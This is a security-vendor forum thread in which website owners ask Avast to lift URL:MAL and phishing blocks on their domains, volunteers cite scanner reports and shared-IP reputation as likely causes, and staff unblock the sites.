213.181.208.128/cgi-sys/defaultwebpage.cgi   is blacklisted for PHISHING: http://urlquery.net/report/ba047b99-2ad9-4f5d-98a6-5de122844094  &  http://urlquery.net/report/1156f16c-3f5f-449e-9f29-521e46f865d0
Dangerous as Google Safebrowsing blocks it as misleading website...phishing recently detected.
See: http://toolbar.netcraft.com/site_report?url=http://213.181.208.128

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Subi on September 12, 2017, 01:26:52 PM
213.181.208.128/cgi-sys/defaultwebpage.cgi
213.181.208.128/img-sys/powered_by_cpanel.svg

Hm, so the 404page and the cpanel logo is phishing... thats why all my hosted sites are blocked by you???

these are the same page of my server:
this is not phishing: http://hosting.aranyoldalak.hu/cgi-sys/defaultwebpage.cgi
nor this: http://hosting.mtt.hu/cgi-sys/defaultwebpage.cgi
this is phishing: http://213.181.208.128/cgi-sys/defaultwebpage.cgi

As I see, these pages are NOT phishing, and I don't know what could I do to remove from the blacklists...
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 12, 2017, 01:29:37 PM
Did you even read my last post ?
Title: Re: How to remove my website from your blacklist?
Post by: Subi on September 12, 2017, 01:35:14 PM
Hi,

oh, the shared server the reason why all the sites blocking. ok. understand.

and it hink i could discuss the balcklist sites for the reason of the listing.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 12, 2017, 01:36:55 PM
Get the clue, it is not the domain that is blacklisted but the IP.
There is no discussion possible/needed.
There are a lot of malicious sites there.
Title: Re: How to remove my website from your blacklist?
Post by: Subi on September 12, 2017, 01:39:29 PM
OK, nothing isperfect :)

thanks a lot! i think i have some work.

bye
Title: Re: How to remove my website from your blacklist?
Post by: WuqiYin on October 24, 2017, 10:45:16 AM
Hi, Eddy!

Could you help me to check this link? Just one link has been blocked with URL:MAL.
The link is http://update.youngzsoft.com/ccboot/update/ccbootsetup.exe.
Other site under update.youngzsoft.com can work normal.

I checked the link in virustotal with these way before:
1. https://www.virustotal.com/#/url/b9a923f8b3a6488e075d9a0f432332b6ebefa649556d432a9701e0f1cb68a526/detection
2. Upload exe file to virustotal to check.
They all shows clean with these two way.

Could you help to analyze the reason? Thank you very much!
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 24, 2017, 12:00:10 PM
Hi WuqiYin,

Probably blocked because of an older cloud IP blacklisting.

No recent alert here: http://urlquery.net/report/f2e0119e-58bd-47cc-a0e0-dec628808ea8

Or to do with the executable, ET POLICY PE EXE or DLL Windows file download HTTP alerted, read:
http://www.solvusoft.com/en/files/error-virus-removal/exe/windows/youngzsoft-inc/ccboot/ccboot-exe/

In both cases we have to wait for an avast team member to arrive here and give a final verdict,
as we are just volunteers with relevant knowledge, but cannot unblock,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Milos on October 24, 2017, 03:49:36 PM
Hello,
URL was unblocked.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: WuqiYin on October 25, 2017, 03:11:52 AM
Hi, Polonus and Milos!

Thank you for your reply!

I have send email to virus@avast.com before and post a URL on avast support page.
They replied me and told me that they detected that file again and the file is clean now.
So, they already removed it from avast block list.

Thank you very much!
Title: Re: How to remove my website from your blacklist?
Post by: Leandro150 on January 20, 2018, 11:46:42 PM
Hi, AVAST is detecting my personal web, and blocking the acces. It only said URL:MAL.

I check my Wordpress site and dont se nothing wrong.. Can you remove  it from the blacklist or tell me what the problem is?

https:///ingeniarting.com

thanks
Title: Re: How to remove my website from your blacklist?
Post by: DavidR on January 20, 2018, 11:53:14 PM
Hi, AVAST is detecting my personal web, and blocking the acces. It only said URL:MAL.

I check my Wordpress site and dont se nothing wrong.. Can you remove  it from the blacklist or tell me what the problem is?

https:///ingeniarting.com

URL:MAL is usually an indication that your site has an external link to a malicious site/url, check your external links to ensure they are meant to be there.

Title: Re: How to remove my website from your blacklist?
Post by: Leandro150 on January 21, 2018, 06:11:41 PM


URL:MAL is usually an indication that your site has an external link to a malicious site/url, check your external links to ensure they are meant to be there.
[/quote]

My site dosnt have any external link at all. Is a very small web site.
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on January 21, 2018, 06:15:45 PM

Submitting a URL:
https://www.avast.com/report-a-url.php

Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 21, 2018, 08:17:12 PM
Check your website here: hackertarget.com/wordpress-security-scan/
and here: hackertarget.com/wordpress-security-scan/

Wait for an avast team member to give a final verdict on the potential insecurity of the website.

Only avast team members can come to unblock, as we are users with relevant knowledge,
but cannot do that.

Your IP was the possible reason for the domain of the website being blocked: https://ransomwaretracker.abuse.ch/ip/192.0.78.24/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 22, 2018, 08:51:41 AM
Hi, I am unblocking the IP, 160.153.96.194, which was likely to be the cause. Do let me know if you have any trouble from now on.
Title: Re: How to remove my website from your blacklist?
Post by: Leandro150 on January 22, 2018, 12:30:31 PM
Thank you very much.
Title: Re: How to remove my website from your blacklist?
Post by: optimierung on January 24, 2018, 06:44:15 PM
Hi there,
our Website gartenfit[.]com has been set to a warning URL:Mal. The support only told me it would be due to lack of compliance with your clean software policy. Unfortunately i can not find the reason behind the whole Avast Clean Guidelines.
There had been a problem caused by a hacker, but it should be fixed in between.
Could you please delete the site from the Blacklist?

best regards
Karsten
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on January 24, 2018, 07:12:25 PM

Submitting a URL:
https://www.avast.com/report-a-url.php

Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 24, 2018, 09:50:56 PM
Hi optimierung,

See where your site could be better "optimalisiert" security wise: https://observatory.mozilla.org/analyze.html?host=www.gartenfit.com
F-grade status and recommendations.
Vulnerable jQuery library detected: http://retire.insecurity.today/#!/scan/9ac0a73693cbf939cab687721bc6e4122fb7761db254613ec07876b82614007c

You share your IP with an abuse IP, that is the reason your domain probably became blocked: https://ransomwaretracker.abuse.ch/ip/81.169.145.82/

Wait for an Avast Team Member to give the final verdict and eventually exclude/unblock your domain for that IP.
We here are just volunteers with relevant knowledge, but only Avast Team Members may unblock.

schönen Gruß,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 25, 2018, 06:36:00 AM
The reason was indeed having been hacked: https://www.phishtank.com/phish_detail.php?phish_id=5439072
I am unblocking the domain now and hope that you made sure that it will not happen in the future :)!
Title: Re: How to remove my website from your blacklist?
Post by: optimierung on January 26, 2018, 09:35:19 AM
Works again. Thank you a lot.
Title: Re: How to remove my website from your blacklist?
Post by: admin232 on April 04, 2018, 07:16:34 PM
Hello,

Our url d3ipinc.com has been blocked by your server, can you please remove it:

https://www.virustotal.com/#/url/b0fff46e99f3ae4788becdcd9759e0b99dfe36d76e11129d99b93e76e9ef0a64/detection

https://transparencyreport.google.com/safe-browsing/search?url=d3ipinc.com

http://www.urlvoid.com/scan/d3ipinc.com/
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on April 04, 2018, 08:15:08 PM
Hi,
domain d3ipinc was removed from blacklist.

Lukas
Title: Re: How to remove my website from your blacklist?
Post by: admin232 on April 04, 2018, 09:11:31 PM
thank you!
Title: Re: How to remove my website from your blacklist?
Post by: Marc259 on April 05, 2018, 12:28:10 PM
My domain 50shadesofmagic.co.za appears blocked by avast.  I have deleted the entire site and replaced it with some simple content, but it is still blocked.

Please can someone have a look at unblocking it?
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on April 06, 2018, 02:27:58 AM
My domain 50shadesofmagic.co.za appears blocked by avast.  I have deleted the entire site and replaced it with some simple content, but it is still blocked.

Please can someone have a look at unblocking it?

Hi.

hxxp://www.50shadesofmagic.co.za  is blacklisted by google as phishing.

https://transparencyreport.google.com/safe-browsing/search?url=www.50shadesofmagic.co.za

IP 69.89.31.122 has been reported in phishtank and host malicious domains

https://www.phishtank.com/phish_detail.php?phish_id=314083

https://www.scumware.org/report/69.89.31.122

Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 07, 2018, 01:07:00 PM
Minimize the security risks of this Utah hosted website, as follows:

Apparently the website is hosted on a compromised server.
IP Address: -69.89.31.122 United States United States
Hosting Service: Unified Layer
Hosting City: Provo
Hosting Region: UT
Hosting Postal: 84606  Risk rating 7 red out of 10: https://toolbar.netcraft.com/site_report?url=50shadesofmagic.co.za

Nameserver IP: -162.159.25.175
Target : -ns2.bluehost.com
Country: United States
Nameserver 0 IP: 162.159.25.175
Target : ns2.bluehost.com

Your site is susceptible to MiM attacks, easier exploitable cause X-Power-By-Header exposed (info proliferation we call this
like http-server-header: nginx/1.12.2, Exim smtpd 4.89_1 via port 26 );

Http Only cookies not used, so vulnerable to cross-site attacks;

SPF not enabled, so emails can be fraudulently sent.

2 vulnerable jQuery libraries detected: https://retire.insecurity.today/#!/scan/90cb38781e94150039657fcd67bb26891643a55a04b944242d477a04225

polonus (volunteer webste security analyst and website error-hunter)

P.S. A final verdict should be given by an avast team member, as they are the only ones to unblock.

We are just volunteers here with relevant knowledge and work towards better website security awareness
and adoption of best policy recommendations.
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on April 09, 2018, 10:21:12 PM
My domain 50shadesofmagic.co.za appears blocked by avast.  I have deleted the entire site and replaced it with some simple content, but it is still blocked.

Please can someone have a look at unblocking it?

Hello.

Use the link if there is a problem

https://www.avast.com/false-positive-file-form.php

it is blocked await time required

Quote from: Avast
Our virus specialists have now cleared its reputation in our database.
With URLs this change should be instant, but it might take up to 24 hours with files.For future reference you might also find the following article to be useful: Avast Clean Guidelines (https://support.avast.com/en-us/article/228/).

URL has been removed from detection. : )
Title: Re: How to remove my website from your blacklist?
Post by: Rodrigo_ on June 17, 2018, 03:01:25 PM
My Blog is blocked in avast

hxxps://neoplayerpodcast.blogspot[.]com


Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 17, 2018, 03:57:41 PM
My Blog is blocked in avast

https://neoplayerpodcast.blogspot.com
Avast is not the only one that dont like it

Blacklisted
https://www.virustotal.com/#/url/a0ed422a01e46c24bdde4cdba511e12ea1530c3f34655f5e4b6fb2a87e394c66/detection

https://www.UnmaskParasites.com/security-report/?page=neoplayerpodcast.blogspot.com

Also listed by TrendMicro  https://global.sitesafety.trendmicro.com/



Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 17, 2018, 04:45:04 PM
Also given as PHIHING website here: https://urlquery.net/report/330ab94f-caa5-4f5a-825a-53588517483c

Redirects and alerts see here: https://aw-snap.info/file-viewer/?protocol=secure&tgt=neoplayerpodcast.blogspot.com&ref_sel=GSP2&ua_sel=ff&fs=1

The block of sc​ript at line 735  looks suspicious! Check to make sure it is legit.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Rodrigo_ on June 24, 2018, 07:27:31 AM
Also given as PHIHING website here: https://urlquery.net/report/330ab94f-caa5-4f5a-825a-53588517483c

Redirects and alerts see here: https://aw-snap.info/file-viewer/?protocol=secure&tgt=neoplayerpodcast.blogspot.com&ref_sel=GSP2&ua_sel=ff&fs=1

The block of sc​ript at line 735  looks suspicious! Check to make sure it is legit.

polonus



I changed the template because of this error.
and now RedLeg is ticking everything right

https://aw-snap.info/file-viewer/?protocol=secure&tgt=neoplayerpodcast.blogspot.com%2F&ref_sel=GSP2&ua_sel=ff&fs=1


Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 24, 2018, 01:02:40 PM
Wait for an avast team member to turn up (probably after the weekend) to unblock, as they are the only ones to do that.
We here are just volunteers with relevant knowledge.
So wait for a final verdict on your website.

When it comes unblocked it is often with an oncoming streaming update of the avast solution.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: José532 on June 25, 2018, 05:34:07 AM
I need remove my site for the blacklist
I clean and remove the strangers directories.

My site es hxxp://www.solarmas[.]com[.]ar

Thanks
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 25, 2018, 09:56:28 AM
I have removed neoplayerpodcast.blogspot[.]com from our blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 25, 2018, 09:58:04 AM
Nice to hear the phishing has been removed - I am removing solarmas[.]com[.]ar from our blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: Александр562 on July 02, 2018, 05:25:54 PM
please remove our website from blacklist hxxps://login.hma.ecvi[.]ru/
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 02, 2018, 06:50:39 PM
Witam Александр562,

Re: https://sitecheck.sucuri.net/results/login.hma.ecvi.ru/
Critical security risk: Your site is blacklisted and needs immediate attention.
Web authorities are blocking traffic because your website is unsafe for visitors.
Sign up to secure your site with guaranteed malware and blacklist removal of some sort.

Error in code here:
Quote
-login.hma.ecvi.ru/assets/ecvi/js/plugins/jquery/jquery-1.9.1.min.js?1530549559
     status: (referer=XXX)saved 92629 bytes ae49e56999d82802727455f0ba83b63acd90a22b
     info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
     info: [decodingLevel=0] found JavaScript
     error: undefined function d.getElementsByTagName
     error: undefined variable d
     info: [element] URL=-login.hma.ecvi.ru/assets/ecvi/js/plugins/jquery/undefined
     info: [1] no JavaScript
     file: ae49e56999d82802727455f0ba83b63acd90a22b: 92629 bytes
     file: d5dba94a76a67a54f2b98b16227da20414542fd9: 72 bytes

jQuery@1.9.1 has 1 known vulnerabilities (1 medium). See https://snyk.io/vuln/npm:jquery for more information.
-https://login.hma.ecvi.ru/login

Consider: https://aw-snap.info/file-viewer/?protocol=secure&tgt=login.hma.ecvi.ru%2Flogin&ref_sel=GSP2&ua_sel=ff&fs=1

114 security issues:
x-content-type-options: 36 errors

validate-set-cookie-header: 2 errors

strict-transport-security: 38 errors

sri: 36 errors

no-vulnerable-javascript-libraries: 1 error

ssllabs: 1 error
according to: https://sonarwhal.com/scanner/8fbbdf6e-7548-40c4-937b-3c47b8f24a57

Wait for an avast team member to comment on the security risk of your site and whether it demands a continuous blocking.

We are just volunteers here with relevant knowledge, but only avast team members can come and unblock,

pozdrawiam,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: JudasPerge on July 02, 2018, 09:06:34 PM
Hello,

Someone can help me ?

I checked my site : cubeofsteel[.]com , with VirusTotal and another scan.
https://www.virustotal.com/#/url/27dc8058a3f231654b96ac695ebab6f34097f7156330c9b13ce52e5b9457f00e/detection (https://www.virustotal.com/#/url/27dc8058a3f231654b96ac695ebab6f34097f7156330c9b13ce52e5b9457f00e/detection)

All results says it safe.

But were blacklisted from Avast and we don't know why.

Can someone remove the site from your blacklist?

Thank you very much !

Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 02, 2018, 10:41:30 PM
Probably blocked because of a general IP block for domains on 163.172.32.234 for malware from site(s),
that shares this address with your domain:
https://www.threatminer.org/host.php?q=163.172.32.234

Also consider: https://www.malwares.com/report/ip?ip=163.172.32.234
and https://www.threatcrowd.org/ip.php?ip=163.172.32.234

Wait for an avast team member to give a final verdict, as we are just volunteers with relevant knowledge,
but only avast team members can unblock when a site does not pose any threat.
Also: https://www.threatcrowd.org/domain.php?domain=forum.cubeofsteel.com

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 03, 2018, 06:38:44 AM
Hi Александр562,
We do not seem to block hxxps://login.hma.ecvi[.]ru/ now. If you still get the warnings, please post a printscreen.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 03, 2018, 06:41:18 AM
Hi JudasPerge,
cubeofsteel[.]com was indeed blocked because 163.172.32[.]234 was blocked (spreaded Andromeda malware in the past). I am unblocking the IP now, but please consider dedicated IP.
Title: Re: How to remove my website from your blacklist?
Post by: JudasPerge on July 03, 2018, 09:02:51 AM
Hello HonzaZ and Polonus,

Thanks a lot for your help !

Have a nice day.
Title: Re: How to remove my website from your blacklist?
Post by: Александр562 on July 03, 2018, 09:13:06 AM
Hello, HonzaZ.
It seems we are ( hxxps://login.hma.ecvi[.]ru/ )  still blocked. Also we have avast business antivirus version.

IMG here https://cloud.mail.ru/public/7EAZ/QiMYCR9tC (https://cloud.mail.ru/public/7EAZ/QiMYCR9tC)

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 03, 2018, 09:28:10 AM
I have disabled another detection on login.hma.ecvi[.]ru/login, hopefully it will be okay in a couple of minutes!
Title: Re: How to remove my website from your blacklist?
Post by: Александр562 on July 03, 2018, 10:25:37 AM
HonzaZ, thx works fine!
Title: Re: How to remove my website from your blacklist?
Post by: Seppi on July 03, 2018, 03:47:13 PM
Hi all

Avast for Windows shows our website to be malicious. But we checked several times using local scans as well as external ones:

https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com

None of those showed a problem with our site. Also tried to send a deblock request to Avast, but they ignored it multiple times now. What should we do?

Thanks & regards
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on July 03, 2018, 03:51:10 PM
Hi all

Avast for Windows shows our website to be malicious. But we checked several times using local scans as well as external ones:

https://www.virustotal.com (https://www.virustotal.com)
http://zulu.zscaler.com (http://zulu.zscaler.com)
http://dnscheck.pingdom.com (http://dnscheck.pingdom.com)
http://www.siteadvisor.com (http://www.siteadvisor.com)

None of those showed a problem with our site. Also tried to send a deblock request to Avast, but they ignored it multiple times now. What should we do?

Thanks & regards
And the website in question is ???
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 03, 2018, 06:42:46 PM
Hi Seppi,

Yes, curious to give it the 3rd party quick and dirty, give the link broken like htxp/htxps or -http or -https or . = dot etc.
and we see whether we can establish what caused the malware alert(s)? Is it hosted at afraid dot org for instance, that could be a reason your sub-domains aren't your sub-domains anymore  ;) and for avast alerts.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Rospez on July 03, 2018, 07:26:39 PM
Hello,
I have an url (not the whole site) that is being blocked for URL:Mal
The page is hxxp://wxw.ik3qar[.]it/software/qarteXt_ita/download/QARTeXt_ITA_Setup.php

Adding at the end the GET params ?d=ok it should start software download (that's my software), while without params it is a redirect to the previous page. In both cases it is detected as a URL:Mal

Can you check for it ?
Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: suporte68 on July 04, 2018, 05:22:56 PM
Hi Avast,

We are an ecommerce solutions provider and some of our clients are being flagged as phishing sites:
ibramacelastic.conexaossl.com.br
elasticibramac.conexaossl.com.br
barzel.conexaossl.com.br

We believe that its a mistake due to the use of a wildcard SSL in their stores.

Could you please remove them from the blacklist?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 04, 2018, 09:15:35 PM
Hi suporte68,

Just dove into one of these domains,

Re: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=barzel.conexaossl.com.br&ref_sel=GSP2&ua_sel=ff&fs=1
Re: low security risk given: https://sitecheck.sucuri.net/results/barzel.conexaossl.com.br
Two warning and a error:fail -> https://sitecheck.sucuri.net/results/barzel.conexaossl.com.br
Two retirable jQuery libraries detected: https://retire.insecurity.today/#!/scan/d55cc763e4906344d62079952c39c3f1412c60bfeaa661ae008c6bdfa1d0ff17
77 security issues (important and minor issues): https://sonarwhal.com/scanner/11a46790-27a3-49d8-b366-e9d130a69e3c
F-grade status and recommendations: https://observatory.mozilla.org/analyze/barzel.conexaossl.com.br
Netcraft risk rating 1 red out of 10: https://toolbar.netcraft.com/site_report?url=barzel.conexaossl.com.br

Let these websites run https://certbot.eff.org/ to properly enable HTTPS on their websites.

Just wait for a final verdict from an avast team member as they are to only ones to come and unblock.

We here are just volunteers with relevant knowledge through 3rd party cold reconnaissance website security analysis.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 04, 2018, 09:26:46 PM
To Rospez,

This is what heuristical scanning turns out at VT -> https://www.virustotal.com/#/domain/www.ik3qar.it
Probably blocked as a PHISHING detection by Avira's: https://www.virustotal.com/#/url/82d6ad6bbeaa42a8e9b94f5bfe136f614468844246ee0f7fbbd7f825aa9d2f76/detection

Consider: https://observatory.mozilla.org/analyze/ik3qar.it

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Rospez on July 05, 2018, 10:17:29 AM
Thanks Polonus,
most (all) of the warnings shown are old, and the link which was potenitially subject to SQLInjection was removed, other were fixed.

I still don't know  the reason of the virus warning, but following my false-positive form fill, warnings were removed and recognized as false positive.

Thanks for help!
Title: Re: How to remove my website from your blacklist?
Post by: Seppi on July 06, 2018, 09:24:08 AM
Hi all

Avast for Windows shows our website to be malicious. But we checked several times using local scans as well as external ones:

https://www.virustotal.com (https://www.virustotal.com)
http://zulu.zscaler.com (http://zulu.zscaler.com)
http://dnscheck.pingdom.com (http://dnscheck.pingdom.com)
http://www.siteadvisor.com (http://www.siteadvisor.com)

None of those showed a problem with our site. Also tried to send a deblock request to Avast, but they ignored it multiple times now. What should we do?

Thanks & regards
And the website in question is ???

Hi, sorry, here it is: hxxps://wildagzug[.]ch/

Still blocked at Avast ... an idea, anyone?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 06, 2018, 02:56:09 PM
It is a general IP detection for your IP caused by another domain sharing the same IP that has been infested: https://urlquery.net/report/7755d347-6acd-4b44-83f6-501812258b79

As your domain does not seem to spread malware: https://aw-snap.info/file-viewer/?protocol=secure&tgt=wildagzug.ch%2F&ref_sel=GSP2&ua_sel=ff&fs=1

Ask for unblocking your domain by an avast team member.
We here are just volunteers with relevant knowledge, but only avast team can come and unblock.

Some improvements you can make with 134 security glitches:
See: https://sonarwhal.com/scanner/5109397b-af5a-4da7-86cf-9ec4994ae1df
F-status and recommendations here: https://observatory.mozilla.org/analyze/wildagzug.ch

Also consider scan results here: https://www.htbridge.com/websec/?id=0Dchzc6R
also: https://asafaweb.com/Scan?Url=https%3A%2F%2Fwildagzug.ch

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 09, 2018, 09:49:39 AM
Rospez, ik3qar[.]it/software/qartest_ita/download/qartest_ita_setup.php was unblocked 04.07., 11:08 CEST.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 09, 2018, 09:53:15 AM
suporte68, I have removed the following from our blacklist:

bezerraenxovais[.]conexaossl[.]com[.]br
elasticibramac[.]conexaossl[.]com[.]br
barzel[.]conexaossl[.]com[.]br
silviaarmarinho[.]conexaossl[.]com[.]br
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 09, 2018, 09:55:18 AM
Seppi, wildagzug[.]ch is not blocked. Can you post a printscreen of the detection?
Title: Re: How to remove my website from your blacklist?
Post by: slaw3k on July 09, 2018, 03:41:25 PM
Could you help me with this one? Link has been blocked with URL:MAL.
The link is hxxp://www.reset2[.]pl/Service/R2firma/10.1/update.exe

I checked the link and it looks clean:
1. https://www.virustotal.com/en/url/0f210739e5985a219103ddb44a3ca8149cf101940888b2577d4259a18c7540fd/analysis/1531143334/
2. https://transparencyreport.google.com/safe-browsing/search?url=http:%2F%2Fwww.reset2.pl%2FService%2FR2firma%2F10.1%2Fupdate.exe

Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 09, 2018, 09:31:47 PM
Witam,

This detection could have been IP related, also consider detections here:
-> https://urlquery.net/report/cf987501-337c-4ca9-a7ca-cbb1d2439b56
blacklisted by Fortinet's.  Suspicious: maxruntime exceeded 10 seconds,
e.g. in wXw.reset2.pl/js/sifr/sifr.js
error in
Quote
wXw.reset2.pl/js/jquery/jquery.ifixpng2.js benign
[nothing detected] (script) wXw.reset2.pl/js/jquery/jquery.ifixpng2.js
     status: (referer=wXw.reset2.pl/)saved 5941 bytes d808ecda01a0902e000b945e4592ab638fb80662
     info: [decodingLevel=0] found JavaScript
     error: undefined variable jQuery
     error: undefined variable $.ifixpng
     error: line:1: SyntaxError: missing ; before statement:
          error: line:1: var $.ifixpng = 1;
          error: line:1: ....^
More code errors, check with compiler for
Quote
line:4: SyntaxError: missing ; before statement:
and
Quote
  wXw.reset2.pl/js/main.js
     status: (referer=wXw.reset2.pl/)saved 14605 bytes da59826b829256199c1c93e0a959a2ed9e433a08
     info: [decodingLevel=0] found JavaScript
     error: undefined variable $
     error: undefined function $
     file: da59826b829256199c1c93e0a959a2ed9e433a08: 14605 bytes

Furthermore see the nine security related issues here: https://sonarwhal.com/scanner/96c01d0d-0504-4d89-8455-c3e0f03ce598

jQuery issue: -http://www.reset2.pl/
Detected libraries:
jquery - 1.3.2 : (active1) -http://www.reset2.pl/js/jquery/jquery-1.3.2.min.js
Info: Severity: medium
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4969
http://research.insecurelabs.org/jquery/test/
https://bugs.jquery.com/ticket/9521
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
(active) - the library was also found to be active by running code
1 vulnerable library detected

Wait for an avast team member to give a final verdict on detection.
W here are just volunteers with relevant knowledge, but cannot come to unblock.

Remember however avast is not the only solution that flags website for malcode,
re: https://urlquery.net/report/cf987501-337c-4ca9-a7ca-cbb1d2439b56

pozdrawiam,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Seppi on July 10, 2018, 10:52:09 AM
Seppi, wildagzug[.]ch is not blocked. Can you post a printscreen of the detection?

Ok, thanks. We'll check again.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 10, 2018, 11:07:15 AM
slaw3k, I do not see any detection, and can download the file without any problem. Can you post a printscreen of the detection?
Title: Re: How to remove my website from your blacklist?
Post by: Capitão_Caverna on July 11, 2018, 01:50:56 AM
Some users on my site are receiving Avast phishing alerts on the following page: https://bj-share.info/torrents.php

I looked for any kind of threat and I did not find it, can you help me?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 11, 2018, 01:19:51 PM
No alerts given here: https://urlquery.net/report/d09c409e-7090-4e46-b64f-a55309a7c298
neither here: https://sitecheck.sucuri.net/results/bj-share.info/torrents.php
Could be this returned - Google Chrome returned code 301 to -https://bj-share.info/torrents.php
& GoogleBot returned code 301 to -https://bj-share.info/torrents.php

The alert could be for
Quote
GET /1/6d5c2d0121?a=144088729&v=1071.385e752&to=M1EEZhNTCEFUUxFaVwobM0AIHQpdUlkLHUgMRA%3D%3D&rst=773&ref=htxps://bj-share.info/login.php&ap=3&fe=654&dc=515&at=HxYHEFtJG08%3D&jsonp=NREUM.setToken HTTP/1.1
Host: -bam.nr-data.net
, which has been blocked for me by uMatrix script blocker.

For security glitches see: https://sonarwhal.com/scanner/19b3cac9-b306-4132-9fe9-6421b33ddfac
like
Quote
validate-set-cookie-header: 2 errors

ERROR
'set-cookie' header to set 'phpsessid' doesn't have the 'secure' directive.
-https://bj-share.info/login.php
ERROR
'set-cookie' header to set 'phpsessid' doesn't have the 'httponly' directive.
-https://bj-share.info/login.php

&
strict-transport-security: 2 errors

ERROR
'strict-transport-security' header was not specified
-https://bj-share.info/login.php
ERROR
'strict-transport-security' header was not specified
-https://bj-share.info/favicon.ico
&

ERROR
jQuery@1.8.2 has 2 known vulnerabilities (2 medium). See https://snyk.io/vuln/npm:jquery for more information.
-https://bj-share.info/login.php

Whenever this site is really being blocked by avast's, wait for a reaction from an avast team member,
as they are the only ones that can come and unblock. We are just volunteers with relevant knowledge.

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on July 11, 2018, 01:32:25 PM
Hi guys,
detection on bj-share[.]info will be fixed in next update

Lukas
Title: Re: How to remove my website from your blacklist?
Post by: ud0g on July 11, 2018, 05:08:44 PM
Dear Avast,

Our website has been flagged by Avast: hxxp://interfaith-wedding[.]org

I have checked it with virustotal.com and others but all show it as being clean.

Can you please remove it from the list?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on July 11, 2018, 05:33:23 PM
Dear Avast,

Our website has been flagged by Avast: hxxp://interfaith-wedding[.]org

I have checked it with virustotal.com and others but all show it as being clean.

Can you please remove it from the list?
Virustotal does not scan websites for infections, it check URLs against a number of blacklists

Seems to containe a javascript going to a blacklisted URL
https://sitecheck.sucuri.net/results/interfaith-wedding.org
http://labs.sucuri.net/db/malware/malware-entry-mwblk2

This blacklisted URL > freecontent.date
https://www.virustotal.com/#/url/f717dbb95288b8c900dc2143967fdaed757ec648fb097ba58fce58b9fb0d8567/detection



Title: Re: How to remove my website from your blacklist?
Post by: ud0g on July 11, 2018, 05:56:03 PM
Thank you for the guidance. I found a hidden "block" in Drupal that contained the offending URL.

The new scan results show the site as clean: https://sitecheck.sucuri.net/results/interfaith-wedding.org?clear

Is this sufficient to unblock it from Avast?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on July 11, 2018, 06:04:55 PM
It also seems you have a outdated Drupal

Quote
Is this sufficient to unblock it from Avast?
Maybe, i will notify @HonzaZ .... check back tomorrow for a reply


you may also use this  >>  https://forum.avast.com/index.php?topic=14433.msg1289438#msg1289438

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 18, 2018, 07:14:05 AM
We do not seem to block interfaith-wedding[.]org, if you are having problems, please post a printscreen.
Title: Re: How to remove my website from your blacklist?
Post by: Александр562 on July 19, 2018, 09:24:37 AM
Hi again, so after few weeks our website in blackList again hxxps://login.hma.ecvi[.]ru/
But we are clean https://www.virustotal.com/ru/url/15e8e2d46e1e9cc812374abfb1e36f5f394f6a98ef5ba1e77d2a498f6e3e749a/analysis/1531984850/
picture here: https://cloud.mail.ru/public/4pNz/SKapjfLsm (https://cloud.mail.ru/public/4pNz/SKapjfLsm)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 19, 2018, 09:34:33 AM
